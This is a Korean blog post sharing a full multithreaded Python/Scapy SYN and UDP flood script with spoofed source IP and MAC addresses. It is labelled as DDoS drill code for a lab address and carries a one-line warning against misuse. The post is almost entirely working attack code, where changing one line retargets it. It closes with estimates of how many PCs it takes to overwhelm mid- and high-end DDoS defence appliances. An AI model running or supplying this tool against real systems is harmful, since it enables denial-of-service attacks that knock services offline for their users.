본문 바로가기
정보보안 월드/정보보안 이야기

Multi-Threaded SYN/UDP Flood Simulator for DDoS Defense Testing

by 레드추파 2025. 9. 3.
728x90
반응형

 

Multi-Threaded SYN/UDP Flood Simulator for DDoS Defense Testing

 

 

 

하기 코드는 DDOS 모의 훈련용 코드이며, 악의적으로 사용시 문제가 발생하므로 점검용으로만 사용 바랍니다.

 

DDOS 모의훈련 공격 코드

scapy syn flooding.py
0.01MB

 

import random
import time
import threading
import itertools
from scapy.all import Ether, IP, TCP, UDP, RandString, RandIP, sendp, conf
import logging
from concurrent.futures import ThreadPoolExecutor
import queue
import sys
import os

# Scapy 로그 레벨 낮추기
conf.verb = 0

# 로깅 설정
logging.basicConfig(level=logging.INFO, format='%(asctime)s [Thread %(thread)d] %(message)s')

# 공통 포트 목록
COMMON_PORTS = [22, 80, 443, 8080, 3389, 53, 21, 23, 445, 1433]

def check_privileges():
    """관리자 권한 확인"""
    if os.name == 'posix' and os.geteuid() != 0:
        logging.error("This script requires root privileges on Linux (sudo).")
        sys.exit(1)
    elif os.name == 'nt' and not ctypes.windll.shell32.IsUserAnAdmin():
        logging.error("This script requires Administrator privileges on Windows.")
        sys.exit(1)

def random_mac():
    """랜덤 MAC 주소 생성"""
    return ":".join(["%02x" % random.randint(0, 255) for _ in range(6)])

def random_ip():
    """랜덤 소스 IP 생성"""
    return RandIP()._fix()

def craft_packet(target_ip, target_port, attack_type='syn'):
    """패킷 생성"""
    try:
        eth = Ether(src=random_mac(), dst="ff:ff:ff:ff:ff:ff")
        ip = IP(src=random_ip(), dst=target_ip, ttl=random.randint(64, 128))
        
        if attack_type == 'syn':
            tcp = TCP(
                sport=random.randint(1024, 65535),
                dport=target_port,
                flags='S',
                seq=random.randint(0, 4294967295),
                window=random.randint(1024, 65535),
                options=[('MSS', random.randint(500, 1460))]
            )
            return eth / ip / tcp
        elif attack_type == 'udp':
            udp = UDP(
                sport=random.randint(1024, 65535),
                dport=target_port
            )
            payload = RandString(size=random.randint(20, 500))
            return eth / ip / udp / payload
        else:
            logging.warning(f"Unknown attack type: {attack_type}")
            return None
    except Exception as e:
        logging.error(f"Error crafting packet: {str(e)}")
        return None

def attack_worker(target_ip, target_ports, duration, packet_rate, thread_id, attack_type, pkt_queue, iface):
    """패킷 전송 워커"""
    end_time = time.time() + duration
    count = 0
    visual = itertools.cycle(["-", "\\", "|", "/"])
    
    while time.time() < end_time:
        try:
            target_port = random.choice(target_ports)
            packet = craft_packet(target_ip, target_port, attack_type)
            if packet:
                sendp(packet, iface=iface, verbose=0)
                count += 1
                pkt_queue.put(1)
                
                if count % packet_rate == 0:
                    logging.info(f"Sent {count} packets {next(visual)}")
            
            time.sleep(1 / packet_rate)
        except Exception as e:
            logging.error(f"Error in thread {thread_id}: {str(e)}")
            time.sleep(0.1)  # 에러 발생 시 잠시 대기
    
    logging.info(f"Finished. Total packets sent: {count}")

def monitor_progress(pkt_queue, duration):
    """진행 상황 모니터링"""
    total_packets = 0
    start_time = time.time()
    
    while time.time() < start_time + duration:
        try:
            total_packets += pkt_queue.qsize()
            pkt_queue.queue.clear()
            time.sleep(1)
            logging.info(f"Total packets sent across all threads: {total_packets}")
        except Exception as e:
            logging.error(f"Monitor error: {str(e)}")
    
    logging.info(f"Final count - Total packets sent: {total_packets}")

def main():
    # 설정
    target_ip = "192.168.1.113"  # 랩 환경 IP
    target_ports = COMMON_PORTS
    duration = 20  # 테스트 시간(초)
    packet_rate = 500  # 초당 패킷 수
    num_threads = 8  # 스레드 수
    attack_type = random.choice(['syn', 'udp'])  # 단일 공격 유형
    iface = conf.iface  # 기본 네트워크 인터페이스 사용

    # 권한 체크
    check_privileges()

    # 네트워크 인터페이스 확인
    logging.info(f"Using network interface: {iface}")

    # 패킷 카운팅용 큐
    pkt_queue = queue.Queue()

    # 모니터링 스레드 시작
    monitor = threading.Thread(target=monitor_progress, args=(pkt_queue, duration))
    monitor.start()

    # 공격 스레드 시작
    with ThreadPoolExecutor(max_workers=num_threads) as executor:
        for i in range(num_threads):
            executor.submit(
                attack_worker,
                target_ip,
                target_ports,
                duration,
                packet_rate,
                i+1,
                attack_type,
                pkt_queue,
                iface
            )

    # 모니터링 스레드 완료 대기
    monitor.join()

    print("[!] 🎯 DDoS Simulation complete. No real network harm done.")

if __name__ == "__main__":
    try:
        import ctypes
        main()
    except KeyboardInterrupt:
        print("\n[!] Simulation interrupted by user")
    except Exception as e:
        print(f"[!] Fatal error occurred: {str(e)}")

 


중급 방어 장비(1M PPS, 10Gbps): 

약 20~50대의 PC로 무력화 가능. 

 

 

고급 방어 장비(10M PPS, 100Gbps): 

약 200~500대의 PC로 무력화 가능.

 

 

WireShark 패킷 캡처 필터

728x90
반응형